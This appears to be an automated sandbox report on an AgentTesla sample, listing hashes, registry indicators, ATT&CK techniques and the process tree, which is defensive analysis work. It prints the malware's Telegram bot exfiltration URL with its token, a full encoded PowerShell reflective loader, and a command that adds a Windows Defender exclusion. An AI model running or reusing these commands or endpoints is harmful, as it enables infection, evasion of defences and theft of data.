Analysis
-
max time kernel
142s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
18/05/2024, 18:33
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240508-en
General
-
Target
file.exe
-
Size
1.0MB
-
MD5
6e5eee49a751e5c04a74497e21c843b6
-
SHA1
dc2f6d5353f4f0738a3e3af5f67a82a4035385fd
-
SHA256
bcfe56501d16cd48586fe4ce169905f5f2fa116e512d4b50c601f3f5ac76ceef
-
SHA512
7e5aa66c102cf447e6ed8a8ab5419c4ec42432e59af3b0e9211a072bec9b6e3cb18e7227f72f386bc5b72c53f0db96269617e2e309915547056ce14eab368892
-
SSDEEP
12288:DFbITxwbed/QIA8EmNOwp+y54zcoF7Ca5Jka4zRExDs4CT/PSPdK/4431M73AyJD:5kTFQBeNwQaIEKzTCPdmM73AyXxFLV
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot6471994916:AAHkdjLXxo_sOhOEXeFpgGf4NrHiZGX6HD8/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" powershell.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4804 powershell.exe 4592 powershell.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 api.ipify.org 28 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4592 set thread context of 5096 4592 powershell.exe 101 -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 5096 installutil.exe 5096 installutil.exe 5096 installutil.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4592 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 5096 installutil.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5096 installutil.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 928 wrote to memory of 4592 928 file.exe 96 PID 928 wrote to memory of 4592 928 file.exe 96 PID 4592 wrote to memory of 4804 4592 powershell.exe 99 PID 4592 wrote to memory of 4804 4592 powershell.exe 99 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 5096 4592 powershell.exe 101 PID 4592 wrote to memory of 3828 4592 powershell.exe 102 PID 4592 wrote to memory of 3828 4592 powershell.exe 102 PID 4592 wrote to memory of 3828 4592 powershell.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAQQAsACAAMAB4AEYAQgAsACAAMAB4AEUAMAAsACAAMAB4ADMAQgAsACAAMAB4ADkARgAsACAAMAB4ADcARgAsACAAMAB4ADMANwAsACAAMAB4ADgANgAsACAAMAB4ADkAMAAsACAAMAB4ADMARAAsACAAMAB4ADcAQgAsACAAMAB4ADkANwAsACAAMAB4ADQAMwAsACAAMAB4ADkARgAsACAAMAB4ADcAQwAsACAAMAB4ADAANwAsACAAMAB4AEYAMAAsACAAMAB4ADEAQQAsACAAMAB4AEYAQwAsACAAMAB4AEQARgAsACAAMAB4ADkANwAsACAAMAB4ADcANgAsACAAMAB4AEUAOAAsACAAMAB4AEEAMQAsACAAMAB4ADAANAAsACAAMAB4ADkANgAsACAAMAB4ADUARAAsACAAMAB4ADcAMwAsACAAMAB4ADEAMwAsACAAMAB4ADYAMgAsACAAMAB4ADQAQgAsACAAMAB4ADIAMwApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0ADAALAAgADAAeAAyADcALAAgADAAeAAyAEEALAAgADAAeAA4ADgALAAgADAAeAA1ADQALAAgADAAeAA3ADUALAAgADAAeAA3ADAALAAgADAAeABDADQALAAgADAAeAA3ADEALAAgADAAeAA1ADkALAAgADAAeABEAEYALAAgADAAeAA3AEUALAAgADAAeAA5ADMALAAgADAAeABGAEMALAAgADAAeABGADkALAAgADAAeAA5ADcAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Command and Scripting Interpreter: PowerShell
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5096
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵PID:3828
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
2Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
33KB
MD5372ad956b41eb69ed573d788d1c3c345
SHA1d938b238dc47899727af8c707866816ffb0b03b7
SHA256830b8c22c6664fa3e113462842678dfdab9a178ecca492467b198e8228202af1
SHA512feb3dc2c6c64ade5a0b80e2a5a6df8c857a6be9feadf2a83f845d6788726849dfb882d1f0dc42344166d2092ec64d25fc8f7899cb69fa14c096ae85cdd13ec33